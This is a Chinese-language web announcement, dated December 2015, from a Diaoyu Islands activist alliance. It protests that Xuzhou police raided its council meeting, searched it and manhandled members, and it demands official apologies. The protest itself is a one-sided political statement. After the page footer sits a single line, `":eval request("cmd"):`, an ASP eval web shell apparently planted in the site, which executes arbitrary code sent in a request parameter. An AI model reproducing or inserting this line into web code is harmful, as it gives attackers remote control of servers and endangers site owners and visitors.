网站公告

世界华人保钓联盟对“徐州事件“严正申明

时间:2015-12-29 10:53:39  作者:总编辑  来源:  查看:982  评论:5
内容摘要:    世界华人保钓联盟2015年第二次理事会12月26日在徐州召开,上午会议一切正常,中午午餐刚开始,四个着警察服装胸前并无佩带执法证件,另五个着便装的自称警察的冲击会场,后了解着便装的是徐州市公安局国保支队,带队的是支队长,穿警服的是派出所的。 ...
    世界华人保钓联盟2015年第二次理事会1226日在徐州召开,上午会议一切正常,中午午餐刚开始,四个着警察服装胸前并无佩带执法证件,另五个着便装的自称警察的冲击会场,后了解着便装的是徐州市公安局国保支队,带队的是支队长,穿警服的是派出所的。

    首先他们一到达会场,并没有出示任何证件,也没有告之他们的身份,就要求我们配合他们,当时我们有几个保钓人士在会场门口抽烟的,要求烟抽完在进会场,被他们直接拒绝,其态度极其恶劣,在不知其身份的情况下,我们要求他们出示证件并表明身份,他们无理的宣称、穿着警服就是警察,不需要出示证件,把我们硬性推进会场,在我们严厉拒绝下,其中一个派出所的警员出示证件,着便装的还是不表明其身份,也不说明来会场的目的,进入会场后,他们在没有任何手续的情况下,对我们会场的物品进行搜查,没有经过我们许可下,就开始拿会场上的文件。我们在和他们交涉的过程中还对我保钓人士粗暴动手,就此事件,经世界华人保钓联盟理事会同意、世界华人保钓联盟严正向江苏省、及徐州市提出抗议:

世界华人保钓联盟理事会在十一月初开始规划,保钓志愿者网名“抗盟怪物“提出承办此会议,经两岸四地协商,同意他的申请。

保钓活动曾经在江苏发生过冲突,2004818日,大陆保钓组织从江苏南通出海去钓鱼岛行动受到南通警察的阻拦,保钓人士还被南通警察殴打和体罚,虽上诉中央政府相关部门,但至今也没有得到任何说法,在江苏举办保钓活动因有前车之鉴,领教过江苏警察的野蛮,我们特别谨慎。世保首先就让世保江苏负责人吴建辉出面知会江苏省政府相关部门,告之世保在江苏的活动,得到口头答复是只要不在南通,不在海边,不阻拦这次活动。同时世保也要求徐州承办者做好和当地公安局的沟通工作,徐州公安局有到举办会议地了解情况,但他们又不直接和”抗盟怪物“接触,说是上级指示:了解会议情况,不和保钓人士直接接触。

一:首先我们向江苏省政府提出抗议,江苏是中国的一个省,在国家已经站在钓鱼岛第一线的今天,江苏省继续对民间保钓活动所采取的态度,是违背国家整体战略的,是违背民意的,是亲日的具体体现。当年的南通事件、今天的徐州事件、给一个说法。

二:向徐州政府提出严正抗议、对徐州市公安局国保支队派出所的野蛮执法,对保钓人士动手,世保要求徐州公安局国保支队道歉。

世保当时就提出要求徐州市国保支队打人者道歉,世保将不在深究此事,从26号中午到现在,世保没有接任他们任何说辞,因此特发抗议文,并将斗争到底,绝不会让南通事件的结果从演。

 

 

世界华人保钓联盟

20151229

 

世界华人保钓联盟对“徐州事件“严正申明
世保盟微信公衆号

微信掃一掃二維碼
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):